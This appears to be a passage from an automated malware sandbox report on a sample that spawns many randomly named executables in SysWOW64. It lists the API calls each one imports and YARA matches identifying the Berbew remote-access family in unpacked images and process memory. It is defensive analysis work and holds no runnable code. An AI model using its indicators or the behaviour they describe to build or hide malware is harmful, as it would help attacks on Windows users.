                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 11_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,11_2_00405C09
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 11_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,11_2_00405133
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 12_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,12_2_00405C09
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 12_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,12_2_00405133
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeCode function: 13_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,13_2_00405C09
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeCode function: 13_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,13_2_00405133
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeCode function: 14_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,14_2_00405C09
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeCode function: 14_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,14_2_00405133
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeCode function: 15_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,15_2_00405C09
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeCode function: 15_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,15_2_00405133
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeCode function: 16_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,16_2_00405C09
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeCode function: 16_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,16_2_00405133
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeCode function: 17_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,17_2_00405C09
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeCode function: 17_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,17_2_00405133
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeCode function: 18_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,18_2_00405C09
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeCode function: 18_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,18_2_00405133
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeCode function: 19_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,19_2_00405C09
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeCode function: 19_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,19_2_00405133
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeCode function: 20_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,20_2_00405C09
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeCode function: 20_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,20_2_00405133
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeCode function: 21_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,21_2_00405C09
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeCode function: 21_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,21_2_00405133
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeCode function: 22_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,22_2_00405C09
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeCode function: 22_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,22_2_00405133
                      Source: C:\Windows\SysWOW64\Baagdk32.exeCode function: 23_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,23_2_00405C09
                      Source: C:\Windows\SysWOW64\Baagdk32.exeCode function: 23_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,23_2_00405133
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeCode function: 24_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,24_2_00405C09
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeCode function: 24_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,24_2_00405133
                      Source: C:\Windows\SysWOW64\Ccapffke.exeCode function: 25_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,25_2_00405C09
                      Source: C:\Windows\SysWOW64\Ccapffke.exeCode function: 25_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,25_2_00405133
                      Source: C:\Windows\SysWOW64\Ceampi32.exeCode function: 26_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,26_2_00405C09
                      Source: C:\Windows\SysWOW64\Ceampi32.exeCode function: 26_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,26_2_00405133
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeCode function: 27_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,27_2_00405C09
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeCode function: 27_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,27_2_00405133

                      Remote Access Functionality

                      barindex
                      Yara detected Berbew
                      Source: Yara matchFile source: 24.2.Cfnpmb32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Opbieagi.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.Ccapffke.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Cnjaioih.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Bqjacldl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Oceoll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.Dmfdkj32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Nejhbi32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.Qgcpihjl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.Bmlhnnne.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Pqeoao32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.Feidnc32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.Efgkjnfn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Oglabl32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Ojacofgb.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Bqjacldl.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Olijjb32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.Plgflqpn.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Cnjaioih.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Cfnpmb32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Olijjb32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.Efgkjnfn.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.Bnnampcf.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Onkcje32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.h879iieoae.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.Dnhmjm32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Ogjdllpi.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.Emogai32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Ojacofgb.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Oglabl32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Opbieagi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Pqeoao32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Bgamkfnl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.Fkogfkdj.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.Camgpi32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.Baagdk32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Ppllkpoo.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.Bnpnbp32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.Ajkolbad.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.Emogai32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Ogjdllpi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.Fhedeo32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.Dfcboo32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Plbmqa32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.Dfcboo32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.Eoappk32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.Bnpnbp32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Oceoll32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.Ajkolbad.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.Feidnc32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.Bmlhnnne.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.Camgpi32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Plbmqa32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.Edgbhcim.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.Fkogfkdj.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.Ccapffke.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.Ceampi32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Odekfoij.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.Bgibkegc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Onkcje32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.Edgbhcim.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Nejhbi32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.Bgibkegc.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.Ceampi32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.Qgcpihjl.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.2.Foaigifk.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Bgamkfnl.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.Fhedeo32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Oeanchcn.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.2.Foaigifk.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.Eoappk32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Ppllkpoo.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Oeanchcn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.Bnnampcf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.h879iieoae.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.Dnhmjm32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.Baagdk32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Odekfoij.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.Plgflqpn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.Dmfdkj32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.1998469389.000000000042A000.00000004.00000001.01000000.00000011.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2006552400.000000000042A000.00000004.00000001.01000000.0000001A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.2029721811.000000000042A000.00000004.00000001.01000000.00000028.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.2021263243.000000000042A000.00000004.00000001.01000000.00000024.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2005214969.000000000042A000.00000004.00000001.01000000.00000018.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2027822384.000000000042A000.00000004.00000001.01000000.00000026.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2000741077.000000000042A000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1986379697.000000000042A000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1990903099.000000000042A000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2017016443.000000000042A000.00000004.00000001.01000000.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2011076811.000000000042A000.00000004.00000001.01000000.0000001D.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.2029071325.000000000042A000.00000004.00000001.01000000.00000027.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2005778309.000000000042A000.00000004.00000001.01000000.00000019.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2016533194.000000000042A000.00000004.00000001.01000000.0000001F.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2007866947.000000000042A000.00000004.00000001.01000000.0000001B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2004277931.000000000042A000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.2031051927.000000000042A000.00000004.00000001.01000000.0000002A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2008521888.000000000042A000.00000004.00000001.01000000.0000001C.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2001790871.000000000042A000.00000004.00000001.01000000.00000014.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2018453034.000000000042A000.00000004.00000001.01000000.00000021.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2019406612.000000000042A000.00000004.00000001.01000000.00000022.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2019682823.000000000042A000.00000004.00000001.01000000.00000023.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2003694218.000000000042A000.00000004.00000001.01000000.00000016.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.2022377114.000000000042A000.00000004.00000001.01000000.00000025.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1993494029.000000000042A000.00000004.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2013905191.000000000042A000.00000004.00000001.01000000.0000001E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2002333377.000000000042A000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.2030625851.000000000042A000.00000004.00000001.01000000.00000029.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1988867655.000000000042A000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2000063573.000000000042A000.00000004.00000001.01000000.00000012.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: h879iieoae.exe PID: 6496, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Nejhbi32.exe PID: 6544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ogjdllpi.exe PID: 6604, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Opbieagi.exe PID: 6648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Oglabl32.exe PID: 6692, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Olijjb32.exe PID: 6744, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Oeanchcn.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Oceoll32.exe PID: 6824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Onkcje32.exe PID: 6860, type: MEMORYSTR
